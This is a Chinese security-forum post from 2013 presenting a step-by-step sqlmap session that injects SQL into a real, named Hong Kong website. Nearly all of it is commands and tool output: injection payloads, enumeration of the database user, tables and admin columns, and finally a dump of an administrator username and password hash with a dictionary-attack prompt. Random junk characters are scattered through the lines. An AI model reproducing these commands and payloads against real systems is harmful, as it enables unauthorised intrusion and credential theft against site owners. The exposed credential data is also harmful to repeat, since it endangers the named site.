找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2310|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db+ J3 G9 B1 @: L
ms "Mysql" --current-user       /*  注解:获取当前用户名称" k+ C- Q2 T0 @7 i. z
    sqlmap/0.9 - automatic SQL injection and database takeover tool- w# y0 J1 O7 r! A
    http://sqlmap.sourceforge.net
  • starting at: 16:53:54
    3 q9 \5 P7 r+ z* A6 S# u; F[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    ! L: ]$ O; R" I  p3 Q# x session file% g: K2 o: @8 O2 [( K9 R1 ^' O
    [16:53:54] [INFO] resuming injection data from session file; f: m+ ~. C4 G! S5 c$ `
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file( M* d5 e3 s( k* D9 v9 P
    [16:53:54] [INFO] testing connection to the target url
    , d/ g$ d; ^) i, L) [- H( Xsqlmap identified the following injection points with a total of 0 HTTP(s) reque. T) x% f' l6 @5 v( _, H' }
    sts:
    : q- U, ]5 t! A5 O' ~. c5 l---4 f; U! \( O7 \" z
    Place: GET# K7 L4 D' ~5 ]- N/ L/ j7 a7 t9 s
    Parameter: id
    0 N4 U& u5 P) m6 ?0 I    Type: boolean-based blind9 {4 U, f9 X( y' s0 e1 L5 }
        Title: AND boolean-based blind - WHERE or HAVING clause# d1 O) B9 @( ]" q2 r. E5 y0 n
        Payload: id=276 AND 799=799$ y) j* z( _& d% P
        Type: error-based
    $ W& F+ A& ?7 Y" S0 m2 P    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    7 w1 Y" p( ]5 G    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,1 ]- S% z; l5 F2 H
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,584 j0 u2 V, h/ f
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    6 v0 y+ K$ z. o; c2 o. Y    Type: UNION query
    : m$ I$ @* J$ z! F4 B' P2 \    Title: MySQL UNION query (NULL) - 1 to 10 columns5 U0 \& k. {( v" g
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    ( U5 `% y9 r2 `(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    " R3 m" U6 b! A2 a" {CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    : H8 [0 j6 `' r0 S% t9 {# `3 g" \, r    Type: AND/OR time-based blind
    ' W" a, W- t$ j- O, l    Title: MySQL > 5.0.11 AND time-based blind
    % Y: N* M4 E5 D+ |3 o* _! X    Payload: id=276 AND SLEEP(5)
    : M/ g, U% g' g! }5 M! s0 W---6 T+ |! o+ @4 w4 d
    [16:53:55] [INFO] the back-end DBMS is MySQL/ ^6 ?1 j# P" P% n
    web server operating system: Windows4 K! q- H% y5 A' T
    web application technology: Apache 2.2.11, PHP 5.3.0
    5 F2 B% J8 j; C4 jback-end DBMS: MySQL 5.0
    3 M$ \5 e8 Z( }% h) `[16:53:55] [INFO] fetching current user
    : I" p0 n+ F* X1 Vcurrent user:    'root@localhost'   - t; o' a) \) r9 Q: m1 Z( |
    [16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    & x7 K" a7 b+ G8 }% Qtput\www.wepost.com.hk'
  • shutting down at: 16:53:58- e+ D$ Z' B# v+ k) P: e7 M: }

    8 M; K* g0 t3 f2 }% FD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db4 x3 j0 c1 W: z# E' y3 l
    ms "Mysql" --current-db                  /*当前数据库
    + b# O3 B5 O* [    sqlmap/0.9 - automatic SQL injection and database takeover tool
    1 S8 U3 R5 p  }    http://sqlmap.sourceforge.net
  • starting at: 16:54:168 B' V0 J" t, E4 c; b" ]% ?
    [16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
      T) {: s3 O: m session file
    : \* j% g9 M& Y1 Q[16:54:16] [INFO] resuming injection data from session file
    8 `  M- K$ ]* H[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    ! u1 E& r/ _$ E" ^[16:54:16] [INFO] testing connection to the target url; |8 H" H4 I- G6 o  h9 g
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque8 Y$ M: ~  \! ^0 B5 v; v% q0 z0 U! p
    sts:6 L  M) Q! u8 r4 X  a
    ---
    / |1 T4 P) A0 @+ L: _& CPlace: GET& m4 J/ B  R# K. v0 E
    Parameter: id
    9 h% `0 h1 ?0 i) m/ h) O    Type: boolean-based blind- D5 t) v3 Y0 i* o2 R
        Title: AND boolean-based blind - WHERE or HAVING clause
    - E; [& h0 a$ {! t    Payload: id=276 AND 799=7992 p4 W$ M4 R5 x! m  ^
        Type: error-based, m7 M0 H9 w8 y2 ?, w# Y( u# u
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause! F( o4 e* o+ Q6 d
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    ( i- z9 |, I: c+ R6 ?+ o1 _( V. T120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    ' C8 e# P) F9 x# |* }8 @* f),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)) m! L* u9 D0 \" [. Y
        Type: UNION query7 r+ T5 P1 ?$ T
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    # g1 ~6 A0 Z% p+ Q2 Q9 a4 s- L5 q    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR3 L2 H' f( A$ Z4 ?0 H& \
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    / e4 C/ M+ k9 u/ Y9 \4 `CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    8 I/ ^$ P/ X$ Z8 P    Type: AND/OR time-based blind- l2 _5 T7 B0 s
        Title: MySQL > 5.0.11 AND time-based blind
    4 l3 V: }9 J4 j/ J    Payload: id=276 AND SLEEP(5)! e. |% U3 _2 ^5 x$ x
    ---, x( {$ |4 \" h7 v  U  S# \! c' }
    [16:54:17] [INFO] the back-end DBMS is MySQL
    + y& u3 o8 D- Lweb server operating system: Windows: d+ o3 j9 ^3 d* G5 S
    web application technology: Apache 2.2.11, PHP 5.3.0
    0 e9 Q/ n+ `" Y/ Lback-end DBMS: MySQL 5.0: [2 g2 X' I1 o  |' d- |; ~
    [16:54:17] [INFO] fetching current database
    0 E1 ?# G" U& [current database:    'wepost'* t, D. e2 w0 J3 |8 n
    [16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    9 y7 W  L5 k! u8 h0 utput\www.wepost.com.hk'
  • shutting down at: 16:54:18
    " |/ a! \" t9 J' Z% [7 WD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    # S& O9 {* }3 _. Ums "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名* A* b3 t8 W0 r, Z5 t
        sqlmap/0.9 - automatic SQL injection and database takeover tool" ~$ l) @% R& l- C& {
        http://sqlmap.sourceforge.net
  • starting at: 16:55:25
    9 b; L4 ^7 D3 b! A[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    ( `& I3 s- ^0 [* N& T  O( X: B0 S session file
    % Q6 F) ]+ ~$ ]  s5 O- @[16:55:25] [INFO] resuming injection data from session file
    + }2 W% U+ x+ I% M+ U/ I3 d[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file" q3 K1 K' Q! h5 M" Q( `- J( |
    [16:55:25] [INFO] testing connection to the target url) [' C4 n9 Y& S6 p# ~7 s
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque: ~5 I/ N9 m6 v' H  Z" b
    sts:
    $ c7 J  m) {0 z. }9 K2 D---' i7 [9 _7 r$ I0 x. v/ x) n
    Place: GET
    1 U- D8 t, J. o/ g& S. oParameter: id
    ' ?5 U7 d. |0 x* G    Type: boolean-based blind4 f  \: O" W! o; S1 h
        Title: AND boolean-based blind - WHERE or HAVING clause2 A1 f7 q+ t+ u8 l; f, ], B2 S* _
        Payload: id=276 AND 799=799  X4 l; ?' ]& U) F+ H- [
        Type: error-based4 o9 _+ r4 L1 x) j
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause; K0 C6 ^* z# ]. S- ^! n
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,3 V. h, ~) }, c. G) G. c
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    $ t4 W' \% K! w7 N3 Y, C) F0 b),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)/ u/ I- t( i8 e- {5 R, T4 J
        Type: UNION query
      s. e- U8 ~. c+ r    Title: MySQL UNION query (NULL) - 1 to 10 columns
    ; C! o* W5 ?0 X; t* V1 t* j    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    9 c9 f7 h1 O3 h% c(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),- o. u9 Z+ H' k( l* n; ]: R" W
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#0 C, Q8 B6 {! T  ^( Q# W
        Type: AND/OR time-based blind
    1 z" \, L2 O" L$ X8 P    Title: MySQL > 5.0.11 AND time-based blind
    " ]8 N6 P5 G# E+ y( {3 k3 w    Payload: id=276 AND SLEEP(5)5 c' Q$ ?& Q- {1 c; t; a
    ---
    6 z# S" h. }* j2 K$ J5 {/ C4 C8 {[16:55:26] [INFO] the back-end DBMS is MySQL
    : t. u2 u! \3 N0 P3 m  y6 vweb server operating system: Windows
    " ^9 B! @/ x0 M% N, p/ g4 Aweb application technology: Apache 2.2.11, PHP 5.3.0' ?6 w& S* x- ~$ ~) t) E+ d0 ]
    back-end DBMS: MySQL 5.0% M  V; y% {& |/ }8 i' |
    [16:55:26] [INFO] fetching tables for database 'wepost', x3 a3 \# m& P/ e
    [16:55:27] [INFO] the SQL query used returns 6 entries. K5 n& X# B' y( ~3 q
    Database: wepost
    0 \2 h, I7 M2 p% V2 M, }[6 tables]" ^# g& {* Q: ^) Z
    +-------------+
    # F; ?3 O' r$ D+ d. t3 V| admin       |
    , y5 h" o6 i6 W0 \0 ^( ]: @: j| article     |5 ^+ ~! Z! J# E: b% a  k
    | contributor |
    : b  h# {# f* U: \; u' M: f; k6 X| idea        |
    1 W+ G5 W7 W6 ~# l5 |/ ^* _| image       |
    3 n, t" M; o# S6 \/ Z7 W| issue       |* \$ i! ~( R% i5 X- c
    +-------------+/ e( k+ y! I7 Z3 H& p
    [16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    ; q  x+ u" K  [, Ktput\www.wepost.com.hk'
  • shutting down at: 16:55:33' ^+ |: W# f% ]3 z& M4 j) v) D
    , e# l% h& t) Y0 p  F# B
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db$ [8 l, L3 @: ?- D0 u, t
    ms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名
    ! T9 u/ K5 H% G; h# K    sqlmap/0.9 - automatic SQL injection and database takeover tool5 g: U0 u' W9 }3 o6 @
        http://sqlmap.sourceforge.net
  • starting at: 16:56:06
    % u5 \9 s( J9 y8 k* C7 Esqlmap identified the following injection points with a total of 0 HTTP(s) reque
    2 B% [6 y. T9 @" Msts:
    6 E: K7 u0 B7 q' r  O: r---+ n5 p) ?+ X( z  R; y/ d
    Place: GET% @7 m+ F3 C. t  s
    Parameter: id
    * ~8 U3 l7 Q* ?$ ?1 T+ n- k    Type: boolean-based blind
    1 X) V4 h5 }3 s- `! I    Title: AND boolean-based blind - WHERE or HAVING clause+ Y0 U7 U( ]) w
        Payload: id=276 AND 799=799
    % [, w+ o7 S9 d( n- z8 V* o    Type: error-based
    0 n4 G% ?7 R* A  [    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause, g1 }1 Z, A; ?, P3 Q
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    $ R0 l: k* h4 n/ ]8 j4 O120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    ( C) e* z) Q% v% C+ i, F),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    3 ^/ l1 ?7 q: U" q& _8 w3 x    Type: UNION query
    . I! u, Z8 O/ q# Z    Title: MySQL UNION query (NULL) - 1 to 10 columns
    1 g! y5 V) t0 S) N( G3 m0 x    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    4 ^3 h0 J" L+ P$ X( m- E- b(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),6 h, n! x9 A& j( g
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#9 z2 T. G0 J, L3 ~5 l( Q+ @+ u
        Type: AND/OR time-based blind" [% T; S) f7 c6 V7 I
        Title: MySQL > 5.0.11 AND time-based blind
    7 F: a/ z. f, F! F    Payload: id=276 AND SLEEP(5)6 K8 O* Z2 [- h( i
    ---( [% \* E. d. [3 S
    web server operating system: Windows8 R4 {( D) ]1 Z
    web application technology: Apache 2.2.11, PHP 5.3.03 a$ t3 q! V1 n+ T! L! ?
    back-end DBMS: MySQL 5.0% Y9 `- |+ [7 i0 q3 I0 r3 }: u, q
    [16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
    8 N. S' a# J6 Ossion': wepost, wepost
    * |/ _6 ~8 I0 z" ~# O( n1 iDatabase: wepost
    9 \) K2 d! [4 i0 U1 nTable: admin
    6 E3 b) o. h! C- g% \/ Q[4 columns]
    1 n# T) w& x1 `1 R( Q8 _- _. F+----------+-------------+
    + ]# L2 ?3 z' e. A+ D: X| Column   | Type        |5 P. {3 N( J4 U3 o' W
    +----------+-------------+
    + I8 i; R& r% R% j| id       | int(11)     |
    5 }( f1 n& ?% L; y| password | varchar(32) |! [) Q+ G$ Z0 U) q& ^
    | type     | varchar(10) |
    # o' \: b' J* [9 j" O6 D$ q| userid   | varchar(20) |% x8 Z# ?+ |5 I& B3 d9 ~9 o
    +----------+-------------+
    " ^5 ~+ X" z6 [7 o
  • shutting down at: 16:56:19
    0 S1 W4 s4 A! X% D! O7 \; ^8 h# G  `) h
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    2 q1 I% j  I5 cms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容8 {* b4 C. [2 v$ z
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    + M( n) F, `. W- z* E    http://sqlmap.sourceforge.net
  • starting at: 16:57:14
    : E( W/ @5 C! E( A7 psqlmap identified the following injection points with a total of 0 HTTP(s) reque! E+ D# ]& P& G$ _! u3 k
    sts:
    + F! m5 O. Y$ I2 l---; ~1 d; |; F$ p7 z3 w1 w7 V
    Place: GET) D; F6 s$ j# s! X* c# G! c
    Parameter: id! J! g/ @# }* f* d' A% l
        Type: boolean-based blind
    & @4 d8 Z% y! S! e0 H- ^! @4 s    Title: AND boolean-based blind - WHERE or HAVING clause' r& Z# h- {/ ~2 y; Y
        Payload: id=276 AND 799=799
    * ^2 E# \* d5 Q) ~% F    Type: error-based; V7 ?) r0 A" H' X/ Z6 H/ F( t
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    ( `' ~. _" F" S6 q9 t/ z1 ], u    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,6 p) E: V& C& [+ P- v6 u8 L
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    % ]6 ~: C- ]( q( N3 i),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    ) `1 d! B. i9 M% c* Z) A" {    Type: UNION query  i+ B1 M& f& I- N  V  B
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    ) i+ P: l* {. x3 ?/ V3 k$ j    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR  q, C4 T/ t( F# q" D/ g
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    ! A2 B* O) G2 k# \4 T& wCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#% W: t* Q9 \; j5 x2 ?1 y7 Y
        Type: AND/OR time-based blind
    - R1 e, i3 K. ?/ w* F/ ?    Title: MySQL > 5.0.11 AND time-based blind
    9 c: `/ o- M$ q- q1 g: C7 h    Payload: id=276 AND SLEEP(5)
    . x/ V; {) N( K! o/ l) z% c* v! h---
    & V. r" t  A/ V8 |web server operating system: Windows( o+ j& K' L! Z
    web application technology: Apache 2.2.11, PHP 5.3.0# B! V/ G: m0 p7 t6 D3 T
    back-end DBMS: MySQL 5.04 H, t/ J: ?- u* {2 x; q) H( W
    recognized possible password hash values. do you want to use dictionary attack o
    % w1 @: }( d/ b$ in retrieved table items? [Y/n/q] y0 s  v3 `0 b3 H  a- X9 Z
    what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]6 }! r- M# X; f7 B/ Z
    do you want to use common password suffixes? (slow!) [y/N] y
    6 U! ?: J( g% Q  Q0 |9 Q" j2 kDatabase: wepost+ C9 L# n/ `$ E8 K
    Table: admin
    " }( F1 _) [) b1 p, K( r[1 entry]
    $ m( q. D3 n+ j+----------------------------------+------------+) h% [; q$ W- r. y
    | password                         | userid     |& |. Q% c/ s& d8 f* ?
    +----------------------------------+------------+$ u/ j! M5 |) l1 w7 o/ w
    | 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
    7 a" m8 B$ z( l; n0 c" ^/ D. m+----------------------------------+------------+
    5 Q4 H# G% R' I5 H
  • shutting down at: 16:58:14
    ! `$ K* ~/ {% M; V' C; v8 Y8 j
    7 [" t+ N9 P- SD:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表